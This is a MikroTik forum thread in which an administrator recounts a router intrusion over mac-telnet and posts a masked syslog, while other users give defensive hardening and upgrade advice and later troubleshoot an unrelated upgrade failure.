After that, I dropped all the ways for him to access the router-board ... added his mac-address which appeared in mikrotik's log to filter rules "input,forward,output" dropping everything possible from his way ... For a sudden after countable minutes and I was still inside the mikrotik session, the router rebooted and I got kicked out! He did it this time and changed the password I knew that from the Syslog!!!!! It was logged because he ran to change the pass prior to entering and kicking him out and prior to changing the log location so I had the chance to read what happened while I was kicked out.

Unfortunately, it seems I have no chance except resetting the router but I am truly so highly disappointed from Mikrotik which I used its hardware/software personally for almost 14 years without a headache ... By this vulnerability which is still active my reliance on Mikrotik is 0 and I will be replacing all my companies firewalls/routers to something more which is rigid.

Sorry guys but we no longer have trust in your stuff.

Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:05 am
by CsXen
Hi.
If you can, try to switch on the packet sniffer, and log everything to and from your WinBox/API port.. and stream it to another machine to record it.
Probably it can be help to discover and resolve the problem.

Best regards: CsXen

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:08 am
by honzam
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
You have a proof? For example, screens or something?

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:11 am
by caresss
Hi.
If you can, try to switch on the packet sniffer, and log everything to and from your WinBox/API port.. and stream it to another machine to record it.
Probably it can be help to discover and resolve the problem.

Best regards: CsXen
I will do so when I reset the router in order to gain access back to it ...

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:11 am
by honzam
Hi.

if you just connect the device to network and you don't care about config at all, it become a ticking bomb for the rest of the network
We have no chance to filter the WAN side, because the Android WinBox app over a mobile net is comes from "random" IP's
You can use VPN for remote access. It's simple and then WAN can be easily filtered...

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:13 am
by caresss
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
You have a proof? For example, screens or something?
I have a full Syslog!

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:15 am
by caresss
Hi.

if you just connect the device to network and you don't care about config at all, it become a ticking bomb for the rest of the network
We have no chance to filter the WAN side, because the Android WinBox app over a mobile net is comes from "random" IP's
You can use VPN for remote access. It's simple and then WAN can be easily filtered...
I secured the router perfectly closing every single anty door! Filtering and blocking the mac address of the attacker didn't do anything! Where is mikrotik from that!

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:18 am
by honzam
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
You have a proof? For example, screens or something?
I have a full Syslog!
And? Can you share it with us? Or with support@mikrotik.com

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:20 am
by caresss
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
You have a proof? For example, screens or something?
I have a full Syslog!
And? Can you share it with us? Or with support@mikrotik.com
I will mask the users and mac address and post the log!

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:55 am
by caresss
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
You have a proof? For example, screens or something?
I have a full Syslog!
And? Can you share it with us? Or with support@mikrotik.com
Date Time Message Text
#Password changed and I cannot access the router anymore!
11/5/18 22:38:15 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
#It seems he rebooted the router and I was unable to login as you see a failure below!
11/5/18 22:38:08 system,error,critical login failure for user NewUserCreated from 192.168.my.ip via winbox
11/5/18 22:37:52 interface,info ether5 link up (speed 1G, full duplex)
11/5/18 22:37:52 interface,info ether3 link up (speed 1G, full duplex)
11/5/18 22:37:52 interface,info ether1 link up (speed 1G, full duplex)
11/5/18 22:37:52 interface,info ether9 link up (speed 100M, full duplex)
11/5/18 22:37:52 interface,info ether8 link up (speed 100M, full duplex)
11/5/18 22:37:52 interface,info ether7-WAN link up (speed 100M, full duplex)
11/5/18 22:37:52 interface,info ether4 link up (speed 100M, full duplex)
11/5/18 22:37:52 interface,info ether2-WAN link up (speed 100M, full duplex)
11/5/18 22:37:08 system,info,account user NewUserCreated logged out from ??:3B:??:22:??:AC via mac-telnet
11/5/18 22:37:08 system,info,account user NewUserCreated logged out from ??:3B:??:22:??:AC via mac-telnet
11/5/18 22:37:08 system,info,account user NewUserCreated logged out from 192.168.my.ip via winbox
11/5/18 22:36:56 system,info user NewUserCreated changed by NewUserCreated
11/5/18 22:32:56 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
11/5/18 22:32:10 system,info,account user NewUserCreated logged out from 192.168.my.ip via telnet
11/5/18 22:32:08 system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
11/5/18 22:29:55 interface,info ether9up (speed 100M, full duplex)
11/5/18 22:29:53 system,info device changed by NewUserCreated
11/5/18 22:29:45 system,info filter rule changed by NewUserCreated
11/5/18 22:29:15 system,info,account user NewUserCreated logged out from 192.168.my.ip via telnet
11/5/18 22:29:10 system,info filter rule added by NewUserCreated
11/5/18 22:29:09 system,info filter rule added by NewUserCreated
11/5/18 22:29:07 system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
11/5/18 22:22:47 system,info,account user NewUserCreated logged out from ??:3B:??:22:??:AC via mac-telnet
11/5/18 22:22:21 system,info device changed by NewUserCreated
#This is the interface he was attacking from. I trusted the mikrotik filter more than disabling the interface BUT he was faster this time to change the newuserpass keeping me out!
11/5/18 22:22:21 interface,info ether9 link down
11/5/18 22:18:01 system,info arp entry changed by NewUserCreated
11/5/18 22:09:11 system,info,account user NewUserCreated logged out from 192.168.my.ip via telnet
11/5/18 22:07:22 system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
11/5/18 22:03:30 system,info mangle rule removed by NewUserCreated
11/5/18 22:03:25 system,info mangle rule removed by NewUserCreated
11/5/18 22:00:47 system,info,account user NewUserCreated logged in from 192.168.my.ip via winbox
11/5/18 21:59:49 system,info,account user NewUserCreated logged out from 192.168.my.ip via winbox
#This tells that I lost hope with everything and I had no other chance other than adding a filter rule to block his mac-address from input,forward,output!BUT nothing worked!
11/5/18 21:59:15 system,info filter rule added by NewUserCreated
11/5/18 21:59:03 system,info filter rule added by NewUserCreated
11/5/18 21:58:49 system,info filter rule added by NewUserCreated
#I can't believe it howcome he knew rapidly the exact newly created user!
11/5/18 21:56:36 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
#After I cleaned fully my mikrotik he tried to login with the old deleted user as you can see below!
11/5/18 21:55:58 system,error,critical login failure for user OldDeletedUser from ??:3B:??:22:??:AC via mac-telnet
11/5/18 21:54:18 system,info address changed by NewUserCreated
11/5/18 21:54:14 system,info address changed by NewUserCreated
11/5/18 21:54:09 system,info address changed by NewUserCreated
11/5/18 21:54:05 system,info address changed by NewUserCreated
11/5/18 21:54:00 system,info address changed by NewUserCreated
11/5/18 21:53:44 system,info address changed by NewUserCreated
11/5/18 21:53:41 system,info address changed by NewUserCreated
11/5/18 21:53:12 system,info address added by NewUserCreated
11/5/18 21:53:07 system,info address changed by NewUserCreated
11/5/18 21:53:07 system,info address changed by NewUserCreated
11/5/18 21:53:07 system,info address changed by NewUserCreated
11/5/18 21:53:07 system,info address changed by NewUserCreated
11/5/18 21:52:55 system,info address changed by NewUserCreated
11/5/18 21:52:44 system,info address changed by NewUserCreated
11/5/18 21:52:44 system,info address changed by NewUserCreated
11/5/18 21:52:44 system,info address changed by NewUserCreated
11/5/18 21:52:44 system,info address changed by NewUserCreated
11/5/18 21:51:21 system,info nat rule changed by NewUserCreated
11/5/18 21:50:20 system,info address changed by NewUserCreated
11/5/18 21:50:06 system,info route changed by NewUserCreated
11/5/18 21:50:03 system,info route changed by NewUserCreated
11/5/18 21:49:32 system,info,account user NewUserCreated logged out from 192.168.my.ip via telnet
11/5/18 21:49:14 system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
11/5/18 21:47:47 system,info address changed by NewUserCreated
11/5/18 21:46:42 system,info route changed by NewUserCreated
11/5/18 21:44:30 system,info nat rule changed by NewUserCreated
11/5/18 21:44:29 system,info nat rule changed by NewUserCreated
11/5/18 21:43:13 system,info nat rule changed by NewUserCreated

I masked his mac and some ips ... after his last mac-telnet and login, logging stopped and I was no longer able to login again.

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 2:07 am
by vecernik87
Thanks for sharing! This does not look good and support staff should be notified. However, unless we give them some better info (ideally packet capture from TAP) I do not believe, they will be able to help. I can personally confirm that the known attack vector was closed. (I still have few devices on purpose with older ROS. I can hack them (i.e. steal passwords from any user) but the same approach does not work on new ROS). There might be another unknown attack vector. In addition, as far as I know, the file with readable passwords is still available in current ROS versions:
What's new in 6.43 (2018-Sep-06 12:44):
....
*) user - all passwords are now hashed and encrypted, plaintext passwords are kept for downgrade (will be removed in later upgrades);
Therefore if there is still some other way to access the file, it means it is still possible to get password of any user.

I will not speculate about possible reasons in your situation. There are many possibilities including unknown vulnerability or incorrect way of resetting device (maybe you didn't wipe it completely or you had it unprotected and connected for few minutes while attacker had enough time to implant some backdoor). Such speculation is wild guessing without knowing what really happened.

Anyway, you mentioned that your firewall rule for MAC address did not work. I can confirm such behavior - MAC winbox/telnet cannot be filtered using /ip firewall rules. For example following code won't do anything:
/ip firewall raw add action=drop chain=prerouting src-mac-address=3C:97:0E:D7:XX:XX
I believe that is happening because MAC winbox/telnet communication is not an IP communication, therefore does not go through "routing" block shown at packet flow and therefore it does not go through any chain available in /ip firewall. (however packet count of such rule still increase, which is weird...)
I found only way to filter incoming non-IP communication by creating a bridge over single interface and using /interface bridge filter. This unfortunately breaks other behavior because bridge will be in running state even if you disconnect the cable from your ethernet port.
Other way to block access to your MAC winbox/telnet is use correct interface-list in /tool mac-server and /tool mac-server mac-winbox. Simply said - there should be no MAC access to your device from WAN port. Can you please clear up, if the attacker was accessing your device from WAN and if you had enabled/disabled MAC access on WAN interface?.

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 9:09 am
by Karas
I masked his mac and some ips ... after his last mac-telnet and login, logging stopped and I was no longer able to login again.
Um, quick question.
Isnt this hacker on your local network?
All the IPs Im seeing are local (unless I skipped over something), and logging in via mac-telnet...

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 10:02 am
by Jotne
With my total respect to Mikrotik let me tell you guys again that your ROS 6.43.4 is still vulnerable ....
Is this the first time this router has been hacked?
Have you done netinstall and added config from scratch?

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 10:41 am
by td32
you can change the password all day long but if someone has remote access on you pc most probably has installed a keyloger also
11/5/18 22:38:15 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 10:59 am
by nescafe2002
Can you identify the MAC address (mac vendor)?

Have you tried looking it up via ip/arp / bridge/hosts or switch/hosts after regaining access to check which interface it is connected to?

Have you crossed checked with your own machines and ensured it isn't a local device?

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 11:21 am
by Deantwo
Hey caresss

As mentioned by vecernik87, MAC-Telnet and MAC-WinBox are not an IP protocols, so an IP firewall will do nothing to block it. You need to configure your interface list to prevent access from any untrusted networks.

The fact that the attacker is using MAC-Telnet or MAC-WinBox means that they have direct access to your router. This can mean that they are INSIDE your network, or maybe they have hacked your ISP's router and are attacking you from there. Assuming that is it isn't from inside your own network, simply exclude your WAN interface from the mactel and mac-winbox interface lists.
For example:
/interface list member print
/interface list member remove [find list~"^mac" interface="WAN"]
/interface list member print

I don't know why you were even fighting the hacker, just unplug the ethernet cables. Then you can reset the router and fix the issues. If you need time to get to the router, you can use the shutdown command so the router goes offline until you manually reboot it by power cycling.
For example:
/system shutdown
y

I suggest netlinstalling the router, to be sure that nothing nasty has happened.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

You can e-mail support@mikrotik.com and they might have more/better suggestions.

By the way if it is your ISP that has been hacked, you might want to let them know. Because if your ISP is compromised, then EVERYTHING you send over the internet is vulnerable to man-in-the-middle attacks.

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 6:42 pm
by caresss
Thanks for sharing! This does not look good and support staff should be notified. However, unless we give them some better info (ideally packet capture from TAP) I do not believe, they will be able to help. I can personally confirm that the known attack vector was closed. (I still have few devices on purpose with older ROS. I can hack them (i.e. steal passwords from any user) but the same approach does not work on new ROS). There might be another unknown attack vector. In addition, as far as I know, the file with readable passwords is still available in current ROS versions:
What's new in 6.43 (2018-Sep-06 12:44):
....
*) user - all passwords are now hashed and encrypted, plaintext passwords are kept for downgrade (will be removed in later upgrades);
Therefore if there is still some other way to access the file, it means it is still possible to get password of any user.

I will not speculate about possible reasons in your situation. There are many possibilities including unknown vulnerability or incorrect way of resetting device (maybe you didn't wipe it completely or you had it unprotected and connected for few minutes while attacker had enough time to implant some backdoor). Such speculation is wild guessing without knowing what really happened.

Anyway, you mentioned that your firewall rule for MAC address did not work. I can confirm such behavior - MAC winbox/telnet cannot be filtered using /ip firewall rules. For example following code won't do anything:
/ip firewall raw add action=drop chain=prerouting src-mac-address=3C:97:0E:D7:XX:XX
I believe that is happening because MAC winbox/telnet communication is not an IP communication, therefore does not go through "routing" block shown at packet flow and therefore it does not go through any chain available in /ip firewall. (however packet count of such rule still increase, which is weird...)
I found only way to filter incoming non-IP communication by creating a bridge over single interface and using /interface bridge filter. This unfortunately breaks other behavior because bridge will be in running state even if you disconnect the cable from your ethernet port.
Other way to block access to your MAC winbox/telnet is use correct interface-list in /tool mac-server and /tool mac-server mac-winbox. Simply said - there should be no MAC access to your device from WAN port. Can you please clear up, if the attacker was accessing your device from WAN and if you had enabled/disabled MAC access on WAN interface?.
Thanks for your time replying with all the above! Yes I was missing the mac access and when I wanted to take over and set them to none he trapped me and kicked me out. Anyway the ether9 is the LAN to the ISP for microwave link with inter branching! When he realized that I was aware of the situation he started resetting every single router on the ISP side almost 30 mikrotik APs with ROS versions below 6.40 ...

The story ended up netinstalling the main backbone which he attacked and restoring all the mikrotik APs after he reset them all and locking everything even the mac side with the latest OS. He wasn't that smart but it was the OS fault. Anyway thank God all is back to normal now after dealing with almost 80 routers and switches. Absolutely pain in the neck and applause for Mikrotik over that :))

We were born to learn so every day is a new school day in this new techie era!
Have a calm eve...

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 6:54 pm
by caresss
With my total respect to Mikrotik let me tell you guys again that your ROS 6.43.4 is still vulnerable ....
Is this the first time this router has been hacked?
Have you done netinstall and added config from scratch?
Unfortunately, it wasn't the 1st time. I was cleaning after him every time but he kept getting back in through that mac-telnet and again mac-winbox. Absolutely Casper! Until yesterday where I decided for the 1st time to install a remote syslog! From that syslog I was able to trace his prints, and started to fight back and clean all what he did ... The funny thing is that while mac-telnet whatever you do the log will not catch it!!! I was expecting to see some commands but nothing! I never knew this :)

An advice, don't take things with carelessness and absolutely install syslog because it is very essential for everything and especially security which comes 1st.
But I confirm 10000% that I updated the ROS to 6.34.4 and it was absolutely clean with totally new user and very long and complicated pass ... It took him seconds to guess the user and logon with it! I was so sure he was out, no scripts, no packet sniffing config, no php file in files nothing and absolutely nothing so he can guess the user. In seconds he guessed it!!! That truly frightened me and I gave up somehow knowing that whatever I will do he will keep coming back. Happened what happened and the lesson learned.

I believe he sniffed the packets between the latest winbox session from my side and the routerboard. There's still somehow a hidden vulnerability!

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 6:58 pm
by caresss
Can you identify the MAC address (mac vendor)?

Have you tried looking it up via ip/arp / bridge/hosts or switch/hosts after regaining access to check which interface it is connected to?

Have you crossed checked with your own machines and ensured it isn't a local device?
Didn't bother to look! This mac was another routerboard switch connected to the interbranching. Probably he natted the port from a pc or winbox enabled os to the machine with this mac to get a different mac other than real one! Mysterious :)

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 6:59 pm
by caresss
you can change the password all day long but if someone has remote access on you pc most probably has installed a keyloger also
11/5/18 22:38:15 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
Noway :) I am a specialist, I use MacOS and is very clean. 0 chance for a keylogger.

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 7:01 pm
by caresss
Hey caresss

As mentioned by vecernik87, MAC-Telnet and MAC-WinBox are not an IP protocols, so an IP firewall will do nothing to block it. You need to configure your interface list to prevent access from any untrusted networks.

The fact that the attacker is using MAC-Telnet or MAC-WinBox means that they have direct access to your router. This can mean that they are INSIDE your network, or maybe they have hacked your ISP's router and are attacking you from there. Assuming that is it isn't from inside your own network, simply exclude your WAN interface from the mactel and mac-winbox interface lists.
For example:
/interface list member print
/interface list member remove [find list~"^mac" interface="WAN"]
/interface list member print

I don't know why you were even fighting the hacker, just unplug the ethernet cables. Then you can reset the router and fix the issues. If you need time to get to the router, you can use the shutdown command so the router goes offline until you manually reboot it by power cycling.
For example:
/system shutdown
y


I suggest netlinstalling the router, to be sure that nothing nasty has happened.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

You can e-mail support@mikrotik.com and they might have more/better suggestions.

By the way if it is your ISP that has been hacked, you might want to let them know. Because if your ISP is compromised, then EVERYTHING you send over the internet is vulnerable to man-in-the-middle attacks.
I was so far from that location, and when I wanted to act badly he was faster :) anyway thank God things went OK this morning and I rescued everything having a very difficult and stressful time.

I'll keep you posted guys if anything new will come up regarding this mysterious issue :)

Re: Winbox vulnerability: please upgrade

Posted: Wed Nov 07, 2018 12:49 pm
by msatter
The hacker, who goes by the name of Alexey and says he works as a server administrator, claims to have disinfected over 100,000 MikroTik routers already.
https://www.zdnet.com/google-amp/articl ... k-routers/

Owners being angry at him should think about that someone from the outside could just walk in their router what is not the intention. As Gray Hat Hacker you are on the wrong side of law but with the good intentions and helping us all, it should not lead to consequences.

Re: Winbox vulnerability: please upgrade

Posted: Wed Nov 07, 2018 1:35 pm
by mozerd
The hacker, who goes by the name of Alexey and says he works as a server administrator, claims to have disinfected over 100,000 MikroTik routers already.
https://www.zdnet.com/google-amp/articl ... k-routers/

Owners being angry at him should think about that someone from the outside could just walk in their router what is not the intention. As Gray Hat Hacker you are on the wrong side of law but with the good intentions and helping us all, it should not lead to consequences.
Based on my experience with MikroTik and MOAB where I have been asked to remotely install the service many of the router firewall's are miss-configured.
The Value proposition that is MikroTik is such that it is very popular because MikroTik is POWERFUL, extensible and inexpensive. Very unfortunately a lot of these configurations are managed by people who have NO idea what they are doing applying the worst possible firewall disciplines one can imagine --- so its not at all surprising that a LOT get hacked.

IMO, MikroTik have provided the basic guidelines to effectively secure the router -- but when the undisciplined admin wants to expand on that capability they break the effective security model and get into trouble enabling the bad guys to invade their territory,

Re: Winbox vulnerability: please upgrade

Posted: Wed Nov 07, 2018 2:22 pm
by Jotne
The hacker, who goes by the name of Alexey and says he works as a server administrator, claims to have disinfected over 100,000 MikroTik routers already.
Can any confirm this, or its just brag?
Has anyone seen a MT that has gotten an access list added to prevent external access?

Re: Winbox vulnerability: please upgrade

Posted: Mon Dec 24, 2018 10:17 pm
by ognjen
Hello,

after a year I came to a hotel that I once heard as a network engineer and I saw the following:

Image

RouterOS before upgrade 6.40.3.
So.. everyone can be attacker and victim!
Be careful - Upgrade RouterOS!

Re: Winbox vulnerability: please upgrade

Posted: Tue Dec 25, 2018 11:10 am
by pe1chl
That is exactly why such advises will not work as long as there is not some form of auto-upgrade...
You get a request from a hotel to install a WiFi, you install and configure equipment uptodate at that time, and you leave.
At that point there is not some hotel desk clerk reading the forum every day and acting upon topics like this.
So the router is left unmanaged. Why would you hire expensive service from a network admin to babysit a $100-$200 box?
And risks like this are the result.
So for an installation like that there should be some menu setting that makes it auto-update to some special release channel
that only gets the important and well-tested updates. (you do not want it to track "stable" or even "long-term" and install
a new version every couple of weeks when that is not required to fix problems, as it always induces a risk of failures)

Re: Winbox vulnerability: please upgrade

Posted: Tue Dec 25, 2018 10:10 pm
by ognjen
@pe1chl You are right. But, let's look the problem with wireless in new update 6.43.8. If I had set up a auto-upgrade, at the time of the upgrade, the entire network would be stopped?! (In 6.43.7: Frequency 5920, Frequence Mode superchannel, Country romania. After upgrade to 6.43.8: Frequency auto, Frequence Mode regulary-domain, Conutry romania. And link is down :shock: )
I know, superchannel with country is wrong conf.. but auto-upgrade can be danger in this example.

Re: Winbox vulnerability: please upgrade

Posted: Wed Dec 26, 2018 2:42 pm
by deanMKD1
Dont have noticed nothing serious in 6.43.4 stable. Winbox port opened still.

Re: Winbox vulnerability: please upgrade

Posted: Fri Dec 28, 2018 4:46 am
by gotsprings
When Mikrotik got rid of master slave... A BLIND update could really "screw some s__t up" on may configurations. And auto update would have resulted in disasterous results. That's what change logs are for, and why you read them before you hit UPDATE.

An unmanaged device gets hacked after the install???
Well it sucks for the person doing cleanup... Until they realize... "THE UNIT WAS UNMANAGED". If the system was set and forget or on break fix... This is a break... Time to fix.

Re: Winbox vulnerability: please upgrade

Posted: Thu Jan 03, 2019 1:30 pm
by m4t7e0
It has come to our attention that a rogue botnet is currently using the same vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.

Steps to be taken:

- Upgrade RouterOS to the latest release
- Change your password after upgrading
- Restore your configuration and inspect it for unknown settings. Delete SOCKS configurations, and any unknown scripts
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

[UPDATED with specific versions]: Full details on what to do and what is affected: https://blog.mikrotik.com/security/winb ... ility.html

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
Thanks, for these information, some mine device (setuped on 18 dic) fw vers 6.42.10 had this "attack".

Re: Winbox vulnerability: please upgrade

Posted: Thu Jan 03, 2019 1:53 pm
by normis
@pe1chl You are right. But, let's look the problem with wireless in new update 6.43.8. If I had set up a auto-upgrade, at the time of the upgrade, the entire network would be stopped?! (In 6.43.7: Frequency 5920, Frequence Mode superchannel, Country romania. After upgrade to 6.43.8: Frequency auto, Frequence Mode regulary-domain, Conutry romania. And link is down :shock: )
I know, superchannel with country is wrong conf.. but auto-upgrade can be danger in this example.
So why would your link be down? Clients connect to whatever frequency the SSID has set. And if you indeed have some very special purpose here, why did you set regulatory country ?

Re: Winbox vulnerability: please upgrade

Posted: Thu Jan 03, 2019 2:20 pm
by pe1chl
So why would your link be down?
I can's speak for his situation but it is not really uncommon that a link goes down when one side changes frequency, e.g. because
that frequency has interference at the other side, is not in the other side's allowed channel list (e.g. it is an outdoor AP that has the
proper indoor/outdoor setting), or because the selected frequency has a lower allowed EIRP and thus the power is reduced.

Re: Winbox vulnerability: please upgrade

Posted: Thu Jan 03, 2019 2:24 pm
by normis
he already upgraded the router, which requires a reboot and link is down anyway (until it's restored in a minute).
power is only reduced if an indoor frequency is selected, which should not happen (frequency list knows outdoor from indoor)

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 2:04 pm
by gotsprings
I upgraded my router and it stopped working...
Check if the update changed your master-slave settings to bridge. Thats the #1 thing I saw taking out routers who upgraded from below 6.40.8 to above it. Fixing the bridges and moving IP/DHCP-Server/Filter-Rules to use the new bridge interface got things going again.

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:00 pm
by weixvenum
im having issues upgrading. it doest do it.. check for uodates then select download and install.. auto reboots but it stays to the version not new one... im using hap ac....

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:04 pm
by Deantwo
im having issues upgrading. it doest do it.. check for uodates then select download and install.. auto reboots but it stays to the version not new one... im using hap ac....
Check the architecture of the router, make sure you are using the correct file.

Need more information to be able to help you. What and how are you updating? From what version to what version? Again how are you doing it?

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:50 pm
by weixvenum
i have hap ac lite with verion 6.42rc24 software version tried diffferent steps updating it to 6.44beta50

1. System>Routerboard>upgrade
then manual reboot
2. System>Package>check for updates> current>downkoad&install
it downloads thenrebiots automatically
3. System>Package>check for updates> release candidate> download and install, then it auto reboots
4.quickset>check for updates>current or release candidate>doenload and install>auto reboot

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:52 pm
by weixvenum
im having issues upgrading. it doest do it.. check for uodates then select download and install.. auto reboots but it stays to the version not new one... im using hap ac....
Check the architecture of the router, make sure you are using the correct file.

Need more information to be able to help you. What and how are you updating? From what version to shat version? Again how are you doing it?
i have hap ac lite with verion 6.42rc24 software version tried diffferent steps updating it to 6.44beta50

1. System>Routerboard>upgrade
then manual reboot
2. System>Package>check for updates> current>downkoad&install
it downloads thenrebiots automatically
3. System>Package>check for updates> release candidate> download and install, then it auto reboots
4.quickset>check for updates>current or release candidate>doenload and install>auto reboot

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:55 pm
by mkx
Anything in log just after reboot?

Did it upgrade to current (6.43.8 ) in the step 2?

Can you post the list of installed packages?

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 6:22 pm
by weixvenum
Anything in log just after reboot?

Did it upgrade to current (6.43.8 ) in the step 2?

Can you post the list of installed packages?
Screen shot of the logs after reboot
logs.jpg
Nope, it did not upgrade to 6.43.8 or the 6.44beta

Packages installed
packages.jpg

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 6:31 pm
by mkx
The problem is that you somehow ended with two instances of package hotspot installed. You can try to uninstall the stand-alone one (the top one on the screenshot which is not idented on the list). If you succeed, then you'll be able to upgrade. If you don't succeed (quite probable), then the only way out is netinstall (make fresh backup, save backup file off device, netinstall it to 6.42.x to ensure highest probability for successful backup restore) and upgrade to desired version after that.

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 7:32 pm
by weixvenum
tha ks.. let me try your suggestion

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 9:33 pm
by weixvenum
The problem is that you somehow ended with two instances of package hotspot installed. You can try to uninstall the stand-alone one (the top one on the screenshot which is not idented on the list). If you succeed, then you'll be able to upgrade. If you don't succeed (quite probable), then the only way out is netinstall (make fresh backup, save backup file off device, netinstall it to 6.42.x to ensure highest probability for successful backup restore) and upgrade to desired version after that.
THANKS a LOT! it worked and its updated.

Re: Winbox vulnerability: please upgrade

Posted: Mon Jan 28, 2019 11:45 pm
by Darman
Did somebody notice, afther that vulnerability ther are thousands entrys in IP-Socks-Access, and when you try to access IP Socks router stuck at 100% cpu, even IP socks are disabled.
Is there any chanse that Mikrotik make an upgrade version that will automaticly remowe that socks access entry?

Re: Winbox vulnerability: please upgrade

Posted: Tue Jan 29, 2019 9:36 am
by whatever
@Darman: if your device got infected you should reset it to factory defaults to ensure all the nasty stuff is removed.

Re: Winbox vulnerability: please upgrade

Posted: Tue Jan 29, 2019 10:24 am
by Darman
@Darman: if your device got infected you should reset it to factory defaults to ensure all the nasty stuff is removed.
Tnx, I know, but it will be cool i we can do that Socks access entry move with update when router are miles away...

Re: Winbox vulnerability: please upgrade

Posted: Tue Jan 29, 2019 10:28 am
by andriys
Darman, how do you think an update will know what socks entries are legitimate and what are not?

Re: Winbox vulnerability: please upgrade

Posted: Tue Jan 29, 2019 10:53 am
by Chupaka
Darman, how do you think an update will know what socks entries are legitimate and what are not?
If CPU is at 100% for the last 5 seconds - remove all IP Socks Access entries xD